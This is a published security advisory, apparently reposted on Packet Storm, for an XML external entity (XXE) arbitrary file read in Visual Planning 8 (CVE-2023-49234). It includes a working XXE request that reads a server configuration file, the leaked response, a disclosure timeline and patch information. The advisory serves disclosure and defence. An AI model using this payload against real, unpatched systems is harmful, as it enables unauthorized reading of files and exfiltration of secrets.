what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Visual Planning 8 Arbitrary File Read

Visual Planning 8 Arbitrary File Read
Posted Apr 5, 2024
Authored by David Brown, Lennert Preuth | Site schutzwerk.com

Authenticated attackers can exploit a weakness in the XML parser functionality of the Visual Planning application in order to obtain read access to arbitrary files on the application server. Depending on configured access permissions, this vulnerability could be used by an attacker to exfiltrate secrets stored on the local file system. All versions prior to Visual Planning 8 (Build 240207) are affected.

tags | exploit, arbitrary, local
advisories | CVE-2023-49234
SHA-256 | bdf19a1c93a8a216cff1545664827634a9baef8a83c8ebb7ba571f139ed08b7a

Visual Planning 8 Arbitrary File Read

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Title
=====

SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in
Visual Planning

Status
======

PUBLISHED

Version
=======

1.0

CVE reference
=============

CVE-2023-49234

Link
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/

Text-only version:
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt

Affected products/vendor
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary
=======

Authenticated attackers can exploit a weakness in the XML parser
functionality of the Visual Planning[0] application in order to obtain
read access to arbitrary files on the application server. Depending on
configured access permissions, this vulnerability could be used by an
attacker to exfiltrate secrets stored on the local file system.

Risk
====

An attacker can use the vulnerability to gather information and
depending on the stored data, exfiltrate secrets from the file system.
Furthermore, HTTP requests can be used for out-of-bands exfiltration and
possibly server side request forgery (SSRF) attacks.

Description
===========

During a recent red teaming assessment, Visual Planning was identified
as part of the customers internet-facing assets. The software is
developed by STILOG I.S.T. and provides resource management and
scheduling features. A security assessment conducted by SCHUTZWERK found
an arbitrary file read vulnerability via XML external entities in Visual
Planning.
The application Admin Center (vpadmin) communicates with the server
through an XML-based protocol that utilizes proprietary compression
methods and is transmitted via HTTP. SCHUTZWERK implemented a custom
proxy as part of an assessment in order to intercept and manipulate the
messages exchanged between application and server.

One of the messages sent by the Admin Center application after
authentication is the following:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.parameters.GetApplicationProperty>
<defaultValue>

</defaultValue>
<propertyName>PWD</propertyName>
<rawResult>false</rawResult>
<section>INSTALLDATA</section>
<userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>

The method GetApplicationProperty is called to request the value of the
property PWD. The server responds with an XML message, where the value
element contains the response of the query:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
<resultValues/>
<status>OK</status>
<value>

</value>
</com.visualplanning.query.result.ApplicationPropertyResult>

In this response it was observed that if the requested property value
could not be resolved, the content of the request element defaultValue
will be reflected as part of the response, making it a suitable back
channel for XML external entity (XXE) injections.

The following message was sent to the Visual Planning application:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM
"C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]>
<com.visualplanning.query.parameters.GetApplicationProperty>
<defaultValue>&example;</defaultValue>
<propertyName>ShowBackground</propertyName>
<rawResult>false</rawResult>
<section>Application</section>
<userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>

The server responds with the content of the requested install.properties
file inside the value element, thus confirming the XML parser is
vulnerable to XML external entity (XXE) injections:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
<resultValues/>
<status>OK</status>
<value>#
#Tue Oct 03 15:37:33 CEST 2023
INSTALLDATA.INSTALLSERIAL=
INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning
INSTALLDATA.OK=Next
INSTALLDATA.PAGE=PROVIDER
INSTALLDATA.POOLMODE=1
INSTALLDATA.PORT=3306
INSTALLDATA.PROVIDERTYPE=MySQL
INSTALLDATA.PWD=ENCODE\:
INSTALLDATA.SERVER=127.0.0.1
INSTALLDATA.SERVERLANG=de
INSTALLDATA.USER=root
INSTALLDATA.VIEWERSERIAL=
</value>
</com.visualplanning.query.result.ApplicationPropertyResult>

Further testing showed that out-of-bands exfiltration via HTTPS requests
is also generally possible.

Solution/Mitigation
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline
===================

2023-11-01: Vulnerability discovered
2023-11-09: Contact vendor in order to determine security contact
2023-11-10: Received generic sales response from vendor
2023-11-14: Contacted CTO of vendor directly
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor
2023-11-24: CVE assigned by Mitre
2023-11-24: Additional technical details provided to vendor
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings
is in progress
2024-01-30: Inquired about mitigation status regarding the reported
vulnerabilities
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were
already fixed
2024-03-08: Sent advisory drafts to vendor
2024-03-28: Received patch information and release of advisory

Contact/Credits
===============

The vulnerability was discovered during an assessment by Lennert Preuth
and David Brown of SCHUTZWERK GmbH.

References
==========

[0] https://www.visual-planning.com/en/

Disclaimer
==========

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
most recent version of this security advisory can be found at SCHUTZWERK
GmbH's website ( https://www.schutzwerk.com ).

Additional information
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6
S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM
ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm
ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO
sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21
YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN
UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9
YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d
TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/
1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML
ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz
mZ2yA2/9ZfQwOawEirQtQr8=
=TUGM
-----END PGP SIGNATURE-----

--
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close